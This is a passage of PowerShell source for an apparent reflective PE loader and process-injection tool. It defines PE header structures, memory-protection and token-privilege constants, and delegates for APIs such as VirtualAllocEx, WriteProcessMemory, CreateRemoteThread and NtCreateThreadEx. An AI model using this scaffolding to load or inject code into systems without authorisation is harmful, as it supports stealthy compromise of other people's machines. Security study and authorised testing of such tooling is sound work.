$IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null\n\t\t($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null\n\t\t($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null\n\t\t($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null\n\t\t($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null\n\t\t($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null\n\t\t($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null\n\t\t($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null\n\t\t($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null\n\t\t($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null\n\t\t($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null\n\t\t($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null\n\t\t($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null\n\t\t$IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32\n\n\t\t#Struct IMAGE_NT_HEADERS64\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264)\n\t\t$TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null\n\t\t$IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64\n\t\t\n\t\t#Struct IMAGE_NT_HEADERS32\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248)\n\t\t$TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null\n\t\t$IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32\n\n\t\t#Struct IMAGE_DOS_HEADER\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64)\n\t\t$TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null\n\n\t\t$e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal')\n\t\t$ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray\n\t\t$FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))\n\t\t$AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4))\n\t\t$e_resField.SetCustomAttribute($AttribBuilder)\n\n\t\t$TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null\n\n\t\t$e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal')\n\t\t$ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray\n\t\t$AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10))\n\t\t$e_res2Field.SetCustomAttribute($AttribBuilder)\n\n\t\t$TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null\n\t\t$IMAGE_DOS_HEADER = $TypeBuilder.CreateType()\t\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER\n\n\t\t#Struct IMAGE_SECTION_HEADER\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40)\n\n\t\t$nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal')\n\t\t$ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray\n\t\t$AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8))\n\t\t$nameField.SetCustomAttribute($AttribBuilder)\n\n\t\t$TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null\n\t\t$IMAGE_SECTION_HEADER = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER\n\n\t\t#Struct IMAGE_BASE_RELOCATION\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8)\n\t\t$TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null\n\t\t$IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION\n\n\t\t#Struct IMAGE_IMPORT_DESCRIPTOR\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20)\n\t\t$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null\n\t\t$IMAGE_IMPORT_DESCRIPTOR = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR\n\n\t\t#Struct IMAGE_EXPORT_DIRECTORY\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40)\n\t\t$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null\n\t\t$IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY\n\t\t\n\t\t#Struct LUID\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8)\n\t\t$TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null\n\t\t$LUID = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value $LUID\n\t\t\n\t\t#Struct LUID_AND_ATTRIBUTES\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12)\n\t\t$TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null\n\t\t$LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value $LUID_AND_ATTRIBUTES\n\t\t\n\t\t#Struct TOKEN_PRIVILEGES\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16)\n\t\t$TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null\n\t\t$TOKEN_PRIVILEGES = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value $TOKEN_PRIVILEGES\n\n\t\treturn $Win32Types\n\t}\n\n\tFunction Get-Win32Constants\n\t{\n\t\t$Win32Constants = New-Object System.Object\n\t\t\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -Value 0x40\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_NX_COMPAT -Value 0x100\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_QUERY -Value 0x0008\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_ADJUST_PRIVILEGES -Value 0x0020\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name SE_PRIVILEGE_ENABLED -Value 0x2\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name ERROR_NO_TOKEN -Value 0x3f0\n\t\t\n\t\treturn $Win32Constants\n\t}\n\n\tFunction Get-Win32Functions\n\t{\n\t\t$Win32Functions = New-Object System.Object\n\t\t\n\t\t$VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc\n\t\t$VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])\n\t\t$VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate)\n\t\t$Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc\n\t\t\n\t\t$VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx\n\t\t$VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])\n\t\t$VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate)\n\t\t$Win32Functions | Add-Member NoteProperty -Name VirtualAllocEx -Value $VirtualAllocEx\n\t\t\n\t\t$memcpyAddr = Get-ProcAddress msvcrt.dll memcpy\n\t\t$memcpyDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr])\n\t\t$memcpy = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value $memcpy\n\t\t\n\t\t$memsetAddr = Get-ProcAddress msvcrt.dll memset\n\t\t$memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr])\n\t\t$memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value $memset\n\t\t\n\t\t$LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA\n\t\t$LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr])\n\t\t$LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value $LoadLibrary\n\t\t\n\t\t$GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress\n\t\t$GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr])\n\t\t$GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value $GetProcAddress\n\t\t\n\t\t$GetProcAddressOrdinalAddr = Get-ProcAddress kernel32.dll GetProcAddress\n\t\t$GetProcAddressOrdinalDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([IntPtr])\n\t\t$GetProcAddressOrdinal = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressOrdinalAddr, $GetProcAddressOrdinalDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddressOrdinal -Value $GetProcAddressOrdinal\n\t\t\n\t\t$VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree\n\t\t$VirtualFreeDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32]) ([Bool])\n\t\t$VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate)\n\t\t$Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree\n\t\t\n\t\t$VirtualFreeExAddr = Get-ProcAddress kernel32.dll VirtualFreeEx\n\t\t$VirtualFreeExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) ([Bool])\n\t\t$VirtualFreeEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeExAddr, $VirtualFreeExDelegate)\n\t\t$Win32Functions | Add-Member NoteProperty -Name VirtualFreeEx -Value $VirtualFreeEx\n\t\t\n\t\t$VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect\n\t\t$VirtualProtectDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool])\n\t\t$VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate)\n\t\t$Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect\n\t\t\n\t\t$GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA\n\t\t$GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr])\n\t\t$GetModuleHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate)\n\t\t$Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle\n\t\t\n\t\t$FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary\n\t\t$FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool])\n\t\t$FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary\n\t\t\n\t\t$OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess\n\t    $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])\n\t    $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name OpenProcess -Value $OpenProcess\n\t\t\n\t\t$WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject\n\t    $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [UInt32]) ([UInt32])\n\t    $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name WaitForSingleObject -Value $WaitForSingleObject\n\t\t\n\t\t$WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory\n        $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])\n        $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value $WriteProcessMemory\n\t\t\n\t\t$ReadProcessMemoryAddr = Get-ProcAddress kernel32.dll ReadProcessMemory\n        $ReadProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])\n        $ReadProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ReadProcessMemoryAddr, $ReadProcessMemoryDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name ReadProcessMemory -Value $ReadProcessMemory\n\t\t\n\t\t$CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread\n        $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])\n        $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name CreateRemoteThread -Value $CreateRemoteThread\n\t\t\n\t\t$GetExitCodeThreadAddr = Get-ProcAddress kernel32.dll GetExitCodeThread\n        $GetExitCodeThreadDelegate = Get-DelegateType @([IntPtr], [Int32].MakeByRefType()) ([Bool])\n        $GetExitCodeThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetExitCodeThreadAddr, $GetExitCodeThreadDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name GetExitCodeThread -Value $GetExitCodeThread\n\t\t\n\t\t$OpenThreadTokenAddr = Get-ProcAddress Advapi32.dll OpenThreadToken\n        $OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool])\n        $OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name OpenThreadToken -Value $OpenThreadToken\n\t\t\n\t\t$GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread\n        $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr])\n        $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name GetCurrentThread -Value $GetCurrentThread\n\t\t\n\t\t$AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges\n        $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], [IntPtr], [UInt32], [IntPtr], [IntPtr]) ([Bool])\n        $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name AdjustTokenPrivileges -Value $AdjustTokenPrivileges\n\t\t\n\t\t$LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA\n        $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], [IntPtr]) ([Bool])\n        $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name LookupPrivilegeValue -Value $LookupPrivilegeValue\n\t\t\n\t\t$ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf\n        $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool])\n        $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf\n\t\t\n\t\t$NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx\n        $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32])\n        $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx\n\t\t\n\t\t$IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process\n        $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool])\n        $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name IsWow64Process -Value $IsWow64Process\n\t\t\n\t\t$CreateThreadAddr = Get-ProcAddress Kernel32.dll CreateThread\n        $CreateThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([IntPtr])\n        $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name CreateThread -Value $CreateThread\n\t\t\n\t\treturn $Win32Functions\n\t}\n\t#####################################\n\n\t\t\t\n\t#####################################\n\t###########    HELPERS   ############\n\t#####################################\n\n\t#Powershell only does signed arithmetic, so if we want to calculate memory addresses we have to use this function\n\t#This will add signed integers as if they were unsigned integers so we can accurately calculate memory addresses\n\tFunction Sub-SignedIntAsUnsigned\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value1,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value2\n\t\t)\n\t\t\n\t\t[Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)\n\t\t[Byte[]]$Value2Bytes = 